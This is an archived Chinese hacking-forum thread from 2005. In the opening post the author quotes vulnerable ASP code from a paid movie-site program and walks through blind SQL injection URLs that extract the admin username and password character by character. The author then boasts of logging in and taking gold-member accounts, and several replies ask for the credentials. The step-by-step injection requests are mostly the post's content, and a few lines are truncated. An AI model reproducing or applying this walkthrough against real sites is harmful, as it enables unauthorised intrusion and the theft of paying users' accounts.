中国网管论坛's Archiver

独行浪子 发表于 2005-6-29 22:07

简单入侵收费电影网站

近日学习sql injection,下载金梅收费电影程序2003会员版看了一通,
现movie.asp这个文件有问题,
dim sql
dim rs
articleid=request("id")
set rs=server.createobject("adodb.recordset")
sql="update learning set hits=hits+1 where articleID="&articleid
rs.open sql,conn,1,3
sql="select * from learning where articleid="&articleid
rs.open sql,conn,1,1
title=rs("title")
ittype=rs("typeid")
没有对变量做任何检查,那就别怪我了,呵呵,找了个目标网站,
我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:
[url]http://www.target.com/movie.asp?id=330[/url] and 1=(select id from password where len(name)>4)
正常返回页面,由此我们可以知道管理员的帐号是大于4位的!
我们继续,
[url]http://www.target.com/movie.asp?id=330[/url] and 1=(select id from password where len(name)>
"无法显示网页",出错了,由此我们可以知道管理员的帐号是大于等于8位的
我们再来,
[url]http://www.target.com/movie.asp?id=330[/url] and 1=(select id from password where len(name)=
正常返回页面,好极了,由此得出
name为8位
同样
[url]http://www.target.com/movie.asp?id=330[/url] and 1=(select id from password where len(pwd)=21)
正常返回页面
pwd为21位,TNND的,这么长!

不管了,我们接下来开始测试管理员的用户名
[url]http://www.target.com/movie.asp?id=320[/url] and 1=(select id from password where asc(mid(name,1,1))>50)
正常返回页面,看来还不够大.
注:mid函数可以把密码分成若干部分取出,使用方法 mid(字符串,起始位,取出的字符串的长度)
[url]http://www.target.com/movie.asp?id=320[/url] and 1=(select id from password where asc(mid(name,1,1))>100)
"无法显示页面",看来比100还小.
[url]http://www.target.com/movie.asp?id=320[/url] and 1=(select id from password where asc(mid(name,1,1))=100)
正常返回页面,于是我们可以得到管理员的用户名第一位的asc码为:100
通过查询asc码表可以得到,
name的第一位为

接下来顺利的得到了name=darkeyes^
然后我们开始测试pwd,呼,有21位啊,真是路漫漫其修远啊!
[url]http://www.target.com/movie.asp?id=320[/url] and 1=(select id from password where asc(mid(pwd,1,1))>100)
正常显示页面,再来
[url]http://www.target.com/movie.asp?id=320[/url] and 1=(select id from password where asc(mid(pwd,1,1))>110)
"无法显示页面",比110小哦,呵呵
[url]http://www.target.com/movie.asp?id=320[/url] and 1=(select id from password where asc(mid(pwd,1,1))=102)
正常显示页面,对了,得到
pwd的第一位为:f

最后顺利的得到了
pwd=xyfsdb7ew8y654231123d
找到管理页面,登录进去,拿了几个黄金会员的帐号,就去慢慢欣赏movies了,呵呵

半点心痕 发表于 2005-7-2 15:26

回复: 简单入侵收费电影网站

看起来好像很容易`~~
做起来`~~~~~就`~`````

蝶之恋 发表于 2005-7-4 09:30

回复: 简单入侵收费电影网站

这样一来就行了吗

yanping109 发表于 2005-7-6 06:46

回复: 简单入侵收费电影网站

[QUOTE=半点心痕]看起来好像很容易`~~
做起来`~~~~~就`~`````[/QUOTE]
原来这样啊
我以为是是什么 方法那?

klbest 发表于 2005-7-12 09:21

回复: 简单入侵收费电影网站

看起来很简单,没有看懂.

robay 发表于 2005-7-13 11:42

回复: 简单入侵收费电影网站

这个工作看来没有时间是很难了。

snow0906 发表于 2005-7-13 14:02

回复: 简单入侵收费电影网站

看不明白呀,好深澳呀!我怎么样才能看明白呀?要多久????

sheet 发表于 2005-8-2 18:05

回复: 简单入侵收费电影网站

直接给个帐号得了

chenywl 发表于 2005-8-10 20:58

回复: 简单入侵收费电影网站

好烦 啊

lyjjyl8 发表于 2005-8-17 15:43

回复: 简单入侵收费电影网站

看起来蛮简单的

cuimartin 发表于 2005-8-19 15:21

回复: 简单入侵收费电影网站

顶啊  ~~~~~~~~~~~~~~~~还没看懂啊????????????????
:sleeping:

长青藤 发表于 2005-8-19 16:04

回复: 简单入侵收费电影网站

太深奥了的,把用户名和密码一起说出来呀

jack123429 发表于 2005-8-19 17:01

回复: 简单入侵收费电影网站

日,是怎么测试的啊~~~说清一点啊~~你查到的他的程序里,没有NAME这个变量啊

zhoy 发表于 2005-8-31 23:09

回复: 简单入侵收费电影网站

超!!!白说啦!!!! :o  :o

jixiang0411 发表于 2005-9-15 23:54

回复: 简单入侵收费电影网站

好东西啊,谢谢楼主分享,支持你!!

冰寒 发表于 2005-9-26 16:10

回复: 简单入侵收费电影网站

不觉得用工具注入简单多了吗?
不过还是感谢楼主,把sql注入的原理说地这么详细

fll1981 发表于 2005-10-8 03:09

回复: 简单入侵收费电影网站

的确是很强!!!!!!!!!!!111 :uzi:

qcxxhsm 发表于 2005-10-9 21:11

回复: 简单入侵收费电影网站

thank u

tantian888 发表于 2005-10-27 11:04

回复: 简单入侵收费电影网站

太复杂了,有软件自动运行吗

藤真 发表于 2005-10-28 10:52

回复: 简单入侵收费电影网站

看不懂呀!!!

页: [1] 2 3

Powered by Discuz! Archiver 6.1.0  © 1999-2008 bbs.bitsCN.com